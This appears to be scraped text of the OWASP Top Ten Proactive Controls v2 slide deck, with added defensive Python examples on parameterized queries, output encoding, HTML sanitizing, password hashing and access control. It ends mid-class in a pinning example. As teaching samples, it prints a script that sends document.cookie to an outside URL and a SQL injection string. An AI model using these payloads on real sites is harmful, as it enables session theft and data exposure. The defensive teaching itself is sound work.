![Page 1: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/1.jpg)
OWASP Top Ten Proactive Controls 2.0
Page 2
OWASP: Core Mission
The Open Web Application Security Project (OWASP) is a 501c3 not-for-profit, also registered in Europe as a worldwide charitable organization, focused on improving the security of software.
Our mission is to make application security visible, so that people and organizations can make informed decisions about true application security risks.
Everyone is welcome to participate in OWASP, and all of our materials are available under free and open software licenses.
Page 3
OWASP Top Ten Proactive Controls v2 … What's new?
Introducing new "proactive controls" to the Top Ten list.
More practical examples (show cases).
A large number of contributors from the (non-)OWASP Community.
Mobile contents: some best practices to consider when building mobile apps (secure storage, authentication, etc.).
Page 4
OWASP Top Ten Proactive Controls – v2
A1 – Verify for Security Early and Often
A2 – Parameterize Queries
A3 – Encode Data
A4 – Validate All Inputs
A5 – Implement Identity and Authentication Controls
A6 – Implement Appropriate Access Controls
A7 – Protect Data
A8 – Implement Logging and Intrusion Detection
A9 – Leverage Security Frameworks and Libraries
A10 – Error and Exception Handling
Page 5
C1: Verify for Security Early and Often
Page 6
Page 7
OWASP ASVS (Proactive Controls).
Page 8
The DevOps challenge to security …
http://fr.slideshare.net/StephendeVries2/continuous-security-testing-with-devops
DevOps: continuous delivery pipeline. Mature DevOps velocity is fast: build, test and deploy can be entirely automated. Code is deployed to production multiple times. Examples:
Amazon: deploy every 11.6 seconds
Etsy: deploy 25+ times/day
Gov.uk: deploys 30 times/day
An agile/continuous development process can be interrupted during a sprint by security testing!
Page 9
Automated Security Testing in a Continuous Delivery Pipeline!
http://devops.com/2015/04/06/automated-security-testing-continuous-delivery-pipeline/
An easy approach to include security testing into continuous integration.
Classical/essential security tests can be automated and executed as standard unit/integration tests.
SecDevOps!
Page 10
BDD-Security Testing framework
http://www.continuumsecurity.net/bdd-intro.html
The BDD-Security framework (Given, When & Then).
Integrates OWASP ZAP, Nessus and port scanning.
JBehave: "story" files.
Page 11
BDD-Security
http://www.continuumsecurity.net/bdd-intro.html
XSS

```gherkin
Scenario: The application should not contain Cross Site Scripting vulnerabilities
Meta: @id scan_xss
Given a fresh scanner with all policies disabled
And the attack strength is set to High
And the Cross-Site-Scripting policy is enabled
When the scanner is run
And false positives described in: tables/false_positives.table are removed
Then no medium or higher risk vulnerabilities should be present
```

```gherkin
Scenario: The application should not contain Cross Site Scripting vulnerabilities
Meta: @id auth_case
When the default user logs in with credentials from: users.table
Then the user is logged in
When the case of the password is changed
And the user logs in from a fresh login page
Then the user is not logged in
```
Page 12
BDD-Security Testing framework
http://www.continuumsecurity.net/bdd-intro.html

```java
@Restricted(users = {"admin"}, sensitiveData = "User List")
public void viewUserList() {
    driver.get(Config.getInstance().getBaseUrl() + "admin/list");
}
```
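The @Restricted annotation above expresses an access-control expectation (only the listed users may reach a page marked sensitive) as a test that the pipeline runs on every build. The following is an added Python example, not code from the slides or from BDD-Security, that performs the same kind of check as an ordinary unit test: it walks an access matrix and reports every user who reaches a page they should not, or is refused a page they should reach. The endpoint table, the user list and the in-memory `fake_app` (which deliberately forgets the check on one endpoint) are constructed for the demo; a real test would issue HTTP requests against the deployed build instead.

```python
"""Automated access-control check in the spirit of BDD-Security's @Restricted.

Added example, not code from the slides or from BDD-Security. The tiny
in-memory "application" below is constructed for the demo.
"""

# Constructed sample: sensitive paths and the users allowed to reach each one.
RESTRICTED = {
    "admin/list": {"admin"},                    # sensitive data: user list
    "admin/settings": {"admin"},
    "account/profile": {"admin", "alice", "bob"},
}
ALL_USERS = ["admin", "alice", "bob", "anonymous"]


def fake_app(user: str, path: str) -> int:
    """Constructed stand-in for the application under test; returns an HTTP status."""
    allowed = RESTRICTED.get(path)
    if allowed is None:
        return 404
    # Deliberate defect for the check to catch: this endpoint forgets authorization.
    if path == "admin/settings":
        return 200
    return 200 if user in allowed else 403


def find_access_violations(app, restricted, users):
    """Return (user, path, status) for every outcome that breaks the access matrix.

    For each sensitive page, every user on its allow-list must get 200 and
    every other user must get 403; anything else is reported.
    """
    violations = []
    for path, allowed in restricted.items():
        for user in users:
            status = app(user, path)
            if user in allowed and status != 200:
                violations.append((user, path, status))
            if user not in allowed and status != 403:
                violations.append((user, path, status))
    return violations


if __name__ == "__main__":
    # Run like a unit test: a non-empty result fails the build.
    for violation in find_access_violations(fake_app, RESTRICTED, ALL_USERS):
        print("ACCESS CONTROL FAILURE:", violation)
```

Wiring this into CI means the "missing function level access control" class of bug (A7 on the slides that follow) is caught by the same test run as any other regression, rather than waiting for a periodic penetration test.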
Page 13
A1 – Injection
A2 – Broken Authentication and Session Management
A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with Known Vulnerabilities
A10 – Unvalidated Redirects and Forwards
Page 14
C2: Parameterize Queries
Page 15
Power of SQL Injection …
Page 16
…
Upper, Lower, Number, Special, Over 16 characters:
`X' or '1'='1' --`
Page 17
SQL Injection

```java
String newName = request.getParameter("newName");
String id = request.getParameter("id");
// vulnerable: untrusted input is concatenated into the SQL text
String query = " UPDATE EMPLOYEES SET NAME="+ newName + " WHERE ID ="+ id;
Statement stmt = connection.createStatement();
```

Parameterized alternatives:

```java
// SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);

// HQL
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
```
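To make the contrast between the two slide snippets concrete, here is an added Python example (not from the slides) that runs the injection string from the previous slide through both query styles against an in-memory SQLite database. The employee table and its rows are constructed for the demo; only the standard library is used.

```python
"""Parameterized queries versus string concatenation, shown on SQLite.

Added example, not code from the slides. The table and rows are constructed.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with a few constructed employee rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE employees (id TEXT PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO employees VALUES (?, ?)",
                    [("1", "Ada"), ("2", "Grace"), ("3", "Linus")])
    return con


def lookup_concat(con: sqlite3.Connection, emp_id: str):
    """VULNERABLE: the slide's pattern, user input spliced into the SQL text."""
    query = "SELECT id, name FROM employees WHERE id = '" + emp_id + "'"
    return con.execute(query).fetchall()


def lookup_param(con: sqlite3.Connection, emp_id: str):
    """SAFE: a bound parameter is always data, never SQL syntax."""
    return con.execute("SELECT id, name FROM employees WHERE id = ?", (emp_id,)).fetchall()


def rename_param(con: sqlite3.Connection, emp_id: str, new_name: str) -> int:
    """The slide's UPDATE, parameterized; returns the number of rows changed."""
    cur = con.execute("UPDATE employees SET name = ? WHERE id = ?", (new_name, emp_id))
    con.commit()
    return cur.rowcount


def run_demo() -> dict:
    """Run the slide's payload through both lookups and report what each returns."""
    con = make_db()
    payload = "X' or '1'='1' --"      # the string shown on the previous slide
    return {
        "concat_rows": len(lookup_concat(con, payload)),   # every row leaks
        "param_rows": len(lookup_param(con, payload)),     # no row has that id
        "renamed": rename_param(con, "2", "Grace H."),
        "after_rename": lookup_param(con, "2"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The payload satisfies the complexity rules listed on the slide and, when concatenated, turns the `WHERE` clause into `id = 'X' or '1'='1' --'`, so the whole table comes back; bound as a parameter it is simply a value that matches nothing.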
Page 18
Page 19
C3: Encode Data
Page 20
Page 21
Page 22
Attack 1: cookie

```html
<script>var badURL='https://owasp.org/somesite/data=' + document.cookie;var img = new Image();img.src = badURL;</script>
```

Attack 2:

```html
<script>document.body.innerHTML='<blink>GO OWASP</blink>';</script>
```
Page 23
OWASP Java Encoder Project
OWASP Java HTML Sanitizer Project
Microsoft Encoder and AntiXSS Library
Page 24
Microsoft Encoder AntiXSS
System.Web.Security.AntiXSS / Microsoft.Security.Application.AntiXSS
Encodes HTML, HTML attributes, XML, CSS and JavaScript. Native .NET.
For use in your User Interface code to defuse script in output.
Page 25
OWASP Java Encoder Project
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
Drop-in encoder; API includes URI encoding. Java 1.5+; version 1.2.
2015-04-12: https://github.com/OWASP/owasp-java-encoder/
Page 26
OWASP Java Encoder Project
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
HTML Contexts
Encode#forHtml, Encode#forHtmlContent, Encode#forHtmlAttribute, Encode#forHtmlUnquotedAttribute
XML Contexts
Encode#forXml, Encode#forXmlContent, Encode#forXmlAttribute, Encode#forXmlComment, Encode#forCDATA
JavaScript Contexts
Encode#forJavaScript, Encode#forJavaScriptAttribute, Encode#forJavaScriptBlock, Encode#forJavaScriptSource
CSS Contexts
Encode#forCssString, Encode#forCssUrl
URI/URL Contexts
Encode#forUri, Encode#forUriComponent
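The point of the per-context list above is that one encoder does not fit every output location. The following is an added Python example, not the OWASP Java Encoder itself: the function names `for_html_content`, `for_html_attribute`, `for_javascript` and `for_uri_component` are this example's stand-ins for `Encode.forHtmlContent`, `Encode.forHtmlAttribute`, `Encode.forJavaScript` and `Encode.forUriComponent`, built on the standard library. `render_greeting` places one untrusted value into three contexts with the matching encoder for each.

```python
"""Contextual output encoding, mirroring the per-context API on the slide.

Added example; not the OWASP Java Encoder. Standard library only.
"""
import html
import json
from urllib.parse import quote


def for_html_content(s: str) -> str:
    """Text between tags: & < > " ' become character references."""
    return html.escape(s, quote=True)


def for_html_attribute(s: str) -> str:
    """Value of a quoted attribute; the caller must put the quotes around it."""
    return html.escape(s, quote=True)


def for_javascript(s: str) -> str:
    """Inside a JS string literal. json.dumps supplies \\" and \\uXXXX escaping;
    < and > are escaped too so '</script>' inside the data cannot end the block."""
    body = json.dumps(s)[1:-1]          # drop json's surrounding double quotes
    return body.replace("<", "\\u003C").replace(">", "\\u003E")


def for_uri_component(s: str) -> str:
    """Query-string value: everything except unreserved characters is percent-encoded."""
    return quote(s, safe="")


def render_greeting(name: str) -> str:
    """The same untrusted value in an attribute, in element content, in a JS
    string and in a URL component, each with the encoder for that context."""
    return (
        f'<p title="{for_html_attribute(name)}">Hello {for_html_content(name)}</p>\n'
        f'<script>var who = "{for_javascript(name)}";</script>\n'
        f'<a href="/search?q={for_uri_component(name)}">search</a>'
    )


if __name__ == "__main__":
    # Constructed input that would break out of every one of these contexts unencoded.
    print(render_greeting('</script><script>alert(document.cookie)</script>'))
```

Using the HTML encoder inside the `<script>` block would be the classic mistake: `&lt;` is not special to JavaScript, so the browser would still see the closing tag. That is why the slide's list has separate JavaScript-context methods.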
Page 27
Ruby on Rails: http://api.rubyonrails.org/classes/ERB/Util.html
PHP: http://twig.sensiolabs.org/doc/filters/escape.html and http://framework.zend.com/manual/2.1/en/modules/zend.escaper.introduction.html
Java/Scala (Updated January 2015): https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
.NET AntiXSS Library (v4.3 NuGet released June 2, 2014): http://www.nuget.org/packages/AntiXss/
GO: http://golang.org/pkg/html/template/
Reform project: https://www.owasp.org/index.php/Category:OWASP_Encoding_Project
Page 28
LDAP Encoding Functions: ESAPI and .NET AntiXSS
Command Injection Encoding Functions: Careful here! ESAPI
XML Encoding Functions: OWASP Java Encoder
Encoder comparison reference: http://boldersecurity.github.io/encoder-comparison-reference/
Page 29
Page 30
C4: Validate All Inputs
Page 31
Page 32
OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
An HTML Sanitizer written in Java which lets you include HTML authored by third parties in your web application while protecting against XSS. Written with security best practices in mind, it has an extensive test suite and has undergone adversarial security review: https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules.
Programmatic POSITIVE policy configuration, without XML config. Based on the Caja project that was donated by Google's AppSec team.
High performance and low memory utilization.
Page 33
Caja
• Caja (pronounced /KAH-hah/)[1] is a Google project for embedding third-party JavaScript in "virtual iframes" based on object-capabilities. Caja rewrites the JavaScript (to ECMAScript 5 strict mode), HTML and CSS so that the embedded code has no free variables and reaches the DOM, HTML and URLs only through wrappers; this is meant to protect the host page against phishing, cross-site scripting and malware.
• The word "caja" is Spanish for "box" or "safe" (as in a bank), the idea being that Caja can safely contain JavaScript programs as well as being a capabilities-based JavaScript.
• Caja is currently used by Google in its Orkut,[2] Google Sites,[3] and Google Apps Script[4] products; in 2008 MySpace,[5][6] Yahoo![7] and Allianz had deployed a very early version of Caja but later abandoned it.
Page 34
OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
Example: validate img tags

```java
public static final PolicyFactory IMAGES = new HtmlPolicyBuilder()
    .allowUrlProtocols("http", "https")
    .allowElements("img")
    .allowAttributes("alt", "src").onElements("img")
    .allowAttributes("border", "height", "width").matching(INTEGER).onElements("img")
    .toFactory();
```

Example: validate link elements

```java
public static final PolicyFactory LINKS = new HtmlPolicyBuilder()
    .allowStandardUrlProtocols()
    .allowElements("a")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .toFactory();
```
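The two policies above are allow-lists: anything not explicitly permitted (an unknown element, an `onerror` attribute, a `javascript:` URL, a non-integer `width`) is dropped rather than pattern-matched as "bad". The following is an added Python example written for this page, not the OWASP library, that re-creates the same two policies on top of `html.parser` so the behaviour can be seen on sample input. The `Policy` class, its field names and the sample HTML are this example's own construction.

```python
"""Allow-list HTML sanitizer in the style of the OWASP Java HTML Sanitizer policies.

Added example, not the OWASP library; the Policy type is this example's design.
"""
import re
from dataclasses import dataclass, field
from html import escape
from html.parser import HTMLParser
from typing import Callable, Dict, Set
from urllib.parse import urlparse

INTEGER = re.compile(r"^[0-9]{1,20}$")      # stands in for the slide's INTEGER matcher
VOID_ELEMENTS = {"img", "br", "hr"}


def any_value(_: str) -> bool:
    """Attribute check that accepts every value (URL attributes still get the scheme check)."""
    return True


@dataclass
class Policy:
    """Which elements survive, and per element which attributes with a validator each."""
    elements: Set[str]
    attributes: Dict[str, Dict[str, Callable[[str], object]]]
    url_attributes: Set[str] = field(default_factory=lambda: {"src", "href"})
    url_protocols: Set[str] = field(default_factory=lambda: {"http", "https"})
    rel_nofollow_on_links: bool = False

    def url_ok(self, value: str) -> bool:
        """Allow-listed schemes only; scheme-less (relative) URLs pass."""
        scheme = urlparse(value.strip()).scheme.lower()
        return scheme == "" or scheme in self.url_protocols


IMAGES = Policy(elements={"img"}, attributes={"img": {
    "alt": any_value, "src": any_value,
    "border": INTEGER.match, "height": INTEGER.match, "width": INTEGER.match}})
LINKS = Policy(elements={"a"}, attributes={"a": {"href": any_value}}, rel_nofollow_on_links=True)


class _Sanitizer(HTMLParser):
    def __init__(self, policy: Policy):
        super().__init__(convert_charrefs=True)
        self.policy, self.out = policy, []
        self.skipping = None        # <script>/<style> whose text is being dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping = tag
            return
        if tag not in self.policy.elements:
            return                   # unknown element: drop the tag, keep its text
        kept = []
        for name, value in attrs:
            check = self.policy.attributes.get(tag, {}).get(name)
            if check is None or value is None or not check(value):
                continue
            if name in self.policy.url_attributes and not self.policy.url_ok(value):
                continue
            kept.append((name, value))
        if tag == "a" and self.policy.rel_nofollow_on_links:
            kept = [(n, v) for n, v in kept if n != "rel"] + [("rel", "nofollow")]
        attr_text = "".join(f' {n}="{escape(v, quote=True)}"' for n, v in kept)
        self.out.append(f"<{tag}{attr_text} />" if tag in VOID_ELEMENTS else f"<{tag}{attr_text}>")

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif tag in self.policy.elements and tag not in VOID_ELEMENTS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skipping is None:
            self.out.append(escape(data, quote=False))


def sanitize(policy: Policy, untrusted_html: str) -> str:
    """Re-serialize untrusted_html keeping only what the policy allows."""
    parser = _Sanitizer(policy)
    parser.feed(untrusted_html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample input.
    print(sanitize(IMAGES, '<img src="javascript:alert(1)" alt="x" width="10" height="ten" onerror="evil()">'))
    print(sanitize(LINKS, '<a href="https://owasp.org" onclick="x()">OWASP</a><script>alert(1)</script>'))
```

Note that the output is re-serialized from the parse tree rather than patched in place, which is what makes the approach robust to malformed markup: the sanitizer never has to guess where a broken tag ends.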
Page 35
Pure JavaScript, client side HTML Sanitization with CAJA!
http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
https://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js
Python: https://pypi.python.org/pypi/bleach
PHP: http://htmlpurifier.org/ and http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
.NET (v4.3 released June 2, 2014): AntiXSS.getSafeHTML/getSafeHTMLFragment, http://www.nuget.org/packages/AntiXss/ and https://github.com/mganss/HtmlSanitizer
Ruby on Rails: https://rubygems.org/gems/loofah and http://api.rubyonrails.org/classes/HTML.html
Page 36
Upload
"crossdomain.xml", "clientaccesspolicy.xml"
(zip, rar), add-on
Page 37
Page 38
C5: Implement Identity and Authentication Controls
Page 39
Page 40
Page 41
1) (Django DoS, Sept 2013)
Page 42
2) salt
`protect( [salt] + [password] );`
32-char or 64-char salt
Page 43
3a)
`PBKDF2([salt] + [password], c=140,000);`
PBKDF2 (FIPS)
Scrypt (bcrypt is also a reasonable choice)
Page 44
3b)
`HMAC-SHA-256( [private key], [salt] + [password] )`
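Steps 2, 3a and 3b above fit together into one storage routine: a fresh random salt per password, a slow derivation (PBKDF2 with c=140,000), and an outer HMAC-SHA-256 under a server-side private key that never goes into the database. The following is an added Python example, not code from the slides; the record format, the field names and the demo server key are this example's choices (the key is a constructed value and would live in a secrets store in practice). PBKDF2 takes the salt as its own parameter, which is how the slide's `[salt] + [password]` is expressed here.

```python
"""Salted PBKDF2 password storage with an HMAC "private key" layer.

Added example, not code from the slides. Standard library only.
"""
import base64
import hashlib
import hmac
import os

ITERATIONS = 140_000            # the slide's c=140,000
SALT_BYTES = 32                 # 32 random bytes per password (slide: 32 or 64 chars)
DEMO_SERVER_KEY = b"constructed-demo-key-not-for-production"   # slide 3b's [private key]


def protect(password: str, salt: bytes, server_key: bytes = DEMO_SERVER_KEY,
            iterations: int = ITERATIONS) -> bytes:
    """3a then 3b: PBKDF2-HMAC-SHA256 over the password with the salt, then
    HMAC-SHA-256 of that output under a key kept outside the database."""
    derived = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)
    return hmac.new(server_key, derived, hashlib.sha256).digest()


def store(password: str) -> str:
    """Create a record 'pbkdf2-hmac$iterations$salt_b64$hash_b64' with a fresh salt."""
    salt = os.urandom(SALT_BYTES)
    digest = protect(password, salt)
    return "$".join(["pbkdf2-hmac", str(ITERATIONS),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(digest).decode("ascii")])


def verify(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    scheme, iterations, salt_b64, hash_b64 = record.split("$")
    if scheme != "pbkdf2-hmac":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    return hmac.compare_digest(protect(password, salt, iterations=int(iterations)), expected)


if __name__ == "__main__":
    record = store("correct horse battery staple")
    print(record)
    print("right password:", verify("correct horse battery staple", record))
    print("wrong password:", verify("Password1!", record))
```

Storing the iteration count inside the record is what lets you raise `ITERATIONS` later and re-hash users as they log in, without invalidating existing records.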
Page 45
…!
Upper, Lower, Number, Special, Over 8 characters:
`Password1!`
Page 46
email, DOB
Choosing and Using Security Questions Cheat Sheet: https://www.owasp.org/index.php/Choosing_and_Using_Security_Questions_Cheat_Sheet
app, SMS token, verify code
Page 47
Page 48
Authentication Cheat Sheet: https://www.owasp.org/index.php/Authentication_Cheat_Sheet
Password Storage Cheat Sheet: https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet
Forgot Password Cheat Sheet: https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet
Session Management Cheat Sheet: https://www.owasp.org/index.php/Session_Management_Cheat_Sheet
ASVS AuthN and Session Requirements
Obviously, Identity is a BIG topic!
Page 49
Page 50
C6: Implement Appropriate Access Controls
Page 51
Page 52
Page 53
Page 54
RBAC (Role-based access control)

```java
// role check: the code has to know which roles may delete accounts
if (user.hasRole("ADMIN") || user.hasRole("MANAGER")) {
    deleteAccount();
}

// permission check: the code asks for the capability, the mapping lives elsewhere
if (user.hasAccess("DELETE_ACCOUNT")) {
    deleteAccount();
}
```
Page 55
ASP.NET Roles vs Claims Authorization
Role Based:

```csharp
[Authorize(Roles = "Jedi,Sith")]
public ActionResult WieldLightsaber() {
    return View();
}
```

Claim Based:

```csharp
[ClaimAuthorize(Permission="CanWieldLightsaber")]
public ActionResult WieldLightsaber()
{
    return View();
}
```
Page 56
Claims-Based
• A claim is a statement about a subject made by an issuer, for example a Drivers License carrying a DateOfBirth claim with the value 8th June 1970. For example if you want access to a night club the authorization process might be:
• The door security officer would evaluate the value of your date of birth claim and whether they trust the issuer (the driving license authority) before granting you access.
Page 57
Apache Shiro
http://shiro.apache.org/
Role check:

```java
if ( currentUser.hasRole( "schwartz" ) ) {
    log.info("May the Schwartz be with you!" );
} else {
    log.info( "Hello, mere mortal." );
}
```
Page 58
Apache Shiro Permission Based Access Control
http://shiro.apache.org/

```java
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
    log.info("You may use a lightsaber ring. Use it wisely.");
} else {
    log.info("Sorry, lightsaber rings are for schwartz masters only.");
}
```
Page 59
Apache Shiro Permission Based Access Control
http://shiro.apache.org/
Instance-level check:

```java
if ( currentUser.isPermitted( "winnebago:drive:eagle5" ) ) {
    log.info("You are permitted to 'drive' the 'winnebago' with license plate (id) 'eagle5'. " +
             "Here are the keys - have fun!");
} else {
    log.info("Sorry, you aren't allowed to drive the 'eagle5' winnebago!");
}
```
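The Shiro snippets above check a permission string of the form `domain:action:instance` rather than a role name, so the code asks "may this subject drive this winnebago?" and the answer is decided by whatever permissions were granted. The following is an added Python example, not Apache Shiro's code: a small matcher for such permission strings that follows the rules Shiro documents for its WildcardPermission (`*` matches any token, a comma list matches any of its tokens, a shorter granted permission implies any longer request, and a shorter request is implied only if the granted tail is all `*`). The `Subject` class and the sample grants are constructed for the demo.

```python
"""Permission-based access control with Shiro-style 'domain:action:instance' strings.

Added example, not Apache Shiro; users and grants below are constructed.
"""


def _parts(perm: str):
    """'printer:print,query:lp7200' -> [{'printer'}, {'print', 'query'}, {'lp7200'}]"""
    return [set(p.split(",")) for p in perm.strip().split(":") if p != ""]


def implies(granted: str, requested: str) -> bool:
    """Does the granted permission string imply the requested one?

    Part by part: '*' or a comma list containing the requested tokens matches.
    "printer:print" (2 parts) implies "printer:print:lp7200" (3 parts);
    "printer:print:lp7200" does NOT imply "printer:print", but "printer:print:*" does.
    """
    g, r = _parts(granted), _parts(requested)
    for i, req in enumerate(r):
        if i >= len(g):
            return True                 # granted is shorter: covers everything below it
        if "*" not in g[i] and not req.issubset(g[i]):
            return False
    return all("*" in part for part in g[len(r):])


class Subject:
    """Stand-in for Shiro's Subject: a name plus the permission strings granted to it."""

    def __init__(self, name: str, permissions):
        self.name = name
        self.permissions = list(permissions)

    def is_permitted(self, requested: str) -> bool:
        return any(implies(p, requested) for p in self.permissions)


def can_drive(subject: Subject, plate: str) -> str:
    """The slide's winnebago check, returning the message instead of logging it."""
    if subject.is_permitted(f"winnebago:drive:{plate}"):
        return f"You are permitted to 'drive' the 'winnebago' with license plate (id) '{plate}'."
    return f"Sorry, you aren't allowed to drive the '{plate}' winnebago!"


if __name__ == "__main__":
    # Constructed subjects: one with a single instance grant, one with a wildcard grant.
    lonestar = Subject("lonestar", ["winnebago:drive:eagle5", "lightsaber:wield"])
    fleet_admin = Subject("fleet-admin", ["winnebago:*"])
    print(can_drive(lonestar, "eagle5"))
    print(can_drive(lonestar, "eagle6"))
    print(can_drive(fleet_admin, "eagle6"))
```

Because the application code only ever asks `is_permitted("winnebago:drive:eagle5")`, adding a new role or reassigning who may drive which vehicle is a data change in the grants, not a code change in every call site, which is the advantage the slide is pointing at over `hasRole`.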
Page 60
Page 61
C7: Protect Data
Page 62
HTTPS?
HTTPS: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
https://www.ssllabs.com/projects/best-practices/
Page 63
HSTS (Strict Transport Security): http://www.youtube.com/watch?v=zEV3HOuM_Vw
Forward Secrecy: https://whispersystems.org/blog/asynchronous-security/
Certificate Creation Transparency: http://certificate-transparency.org
Certificate Pinning: https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Browser Certificate Pruning
Page 64
HSTS (Strict Transport Security)
Current HSTS Chrome preload list http://src.chromium.org/viewvc/chrome/trunk/src/net/http/transport_security_state_static.json
If you own a site that you would like to see included in the preloaded Chromium HSTS list, start sending the HSTS header and then contact: https://hstspreload.appspot.com/
A site is included in the Firefox preload list if the following hold:
It is in the Chromium list (with force-https).
It sends an HSTS header.
The max-age sent is at least 10886400 (18 weeks).
http://dev.chromium.org/sts
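An added check, not from the OWASP slides, that tests a Strict-Transport-Security value against the 18-week minimum stated above (max-age at least 10886400); also requiring includeSubDomains and preload mirrors the hstspreload submission form and is an assumption of this example.

```python
import re

MIN_PRELOAD_MAX_AGE = 10886400  # 18 weeks, the minimum stated on the slide


def parse_hsts(header_value):
    """Split a Strict-Transport-Security value into {directive: value}.
    Directive names are case-insensitive; a missing value becomes ''."""
    directives = {}
    for part in header_value.split(";"):
        part = part.strip()
        if part:
            name, _, value = part.partition("=")
            directives[name.strip().lower()] = value.strip().strip('"')
    return directives


def preload_problems(header_value, require_submission_directives=True):
    """Return the reasons a header would not qualify for the preload list.
    An empty list means it passes every check applied here."""
    if header_value is None:
        return ["no Strict-Transport-Security header sent"]
    d = parse_hsts(header_value)
    problems = []
    if not re.fullmatch(r"\d+", d.get("max-age", "")):
        problems.append("max-age missing or not an integer")
    elif int(d["max-age"]) < MIN_PRELOAD_MAX_AGE:
        problems.append("max-age %s is below %d (18 weeks)"
                        % (d["max-age"], MIN_PRELOAD_MAX_AGE))
    if require_submission_directives:
        # Assumption: the hstspreload submission form also wants these two.
        if "includesubdomains" not in d:
            problems.append("includeSubDomains directive missing")
        if "preload" not in d:
            problems.append("preload directive missing")
    return problems


def preload_ready(header_value):
    return not preload_problems(header_value)


if __name__ == "__main__":
    # Constructed sample headers, not captured from any real site
    for h in ("max-age=31536000; includeSubDomains; preload", "max-age=86400", None):
        print(repr(h), "->", preload_problems(h) or "OK")
```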
![Page 65: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/65.jpg)
Pinning?
Pinning is a key continuity scheme
Detect when an imposter with a fake but CA validated certificate attempts to act like the real server
2 types of pinning:
Carry around a copy of the server's public key;
Great if you are distributing a dedicated client-server application since you know the server's certificate or public key in advance
Note of the server's public key on first use
Trust-on-First-Use (TOFU) pinning
Useful when no a priori knowledge exists, such as SSH or a Browser
Certificate Pinning https://www.owasp.org/index.php/Pinning_Cheat_Sheet
![Page 66: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/66.jpg)
Browser-Based TOFU Pinning https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Browser-Based TOFU Pinning: Trust on First Use
HTTP Public Key Pinning IETF Draft http://tools.ietf.org/html/draft-ietf-websec-key-pinning-11
Public-Key-Pins: pin-sha1="4n972HfV354KP560yw4uqe/baXc="; pin-sha1="qvTGHdzF6KLavt4PO0gs2a6pQ00="; pin-sha256="LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ="; max-age=10000; includeSubDomains
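An added example, not from the slides or the OWASP cheat sheet, covering both pinning styles above: a preset pin set parsed from a Public-Key-Pins header and a trust-on-first-use store. SubjectPublicKeyInfo bytes are stood in by constructed byte strings; the draft's sample pin-sha256 happens to be the SHA-256 of the bytes "hello", so the preset check can be exercised offline.

```python
import base64
import hashlib


def spki_pin(spki_der, alg="sha256"):
    """A pin as the HPKP draft defines it: base64(hash(SubjectPublicKeyInfo))."""
    return base64.b64encode(hashlib.new(alg, spki_der).digest()).decode("ascii")


def parse_hpkp(header_value):
    """Parse a Public-Key-Pins value into pin sets keyed by hash algorithm
    plus max-age and includeSubDomains."""
    pins = {"sha256": set(), "sha1": set(), "max-age": None, "includeSubDomains": False}
    for part in header_value.split(";"):
        name, _, value = part.strip().partition("=")
        name = name.strip().lower()
        value = value.strip().strip('"')
        if name.startswith("pin-"):
            pins.setdefault(name[4:], set()).add(value)  # pin-sha256 / pin-sha1
        elif name == "max-age":
            pins["max-age"] = int(value)
        elif name == "includesubdomains":
            pins["includeSubDomains"] = True
    return pins


def matches_preset_pin(spki_der, pins):
    """Preset pinning: the client ships the expected key, so a key whose SHA-256
    pin is not in the set is treated as an imposter even if CA-validated."""
    return spki_pin(spki_der, "sha256") in pins["sha256"]


class TofuPinStore:
    """Trust-on-first-use: remember the first key seen per host, alert on change."""

    def __init__(self):
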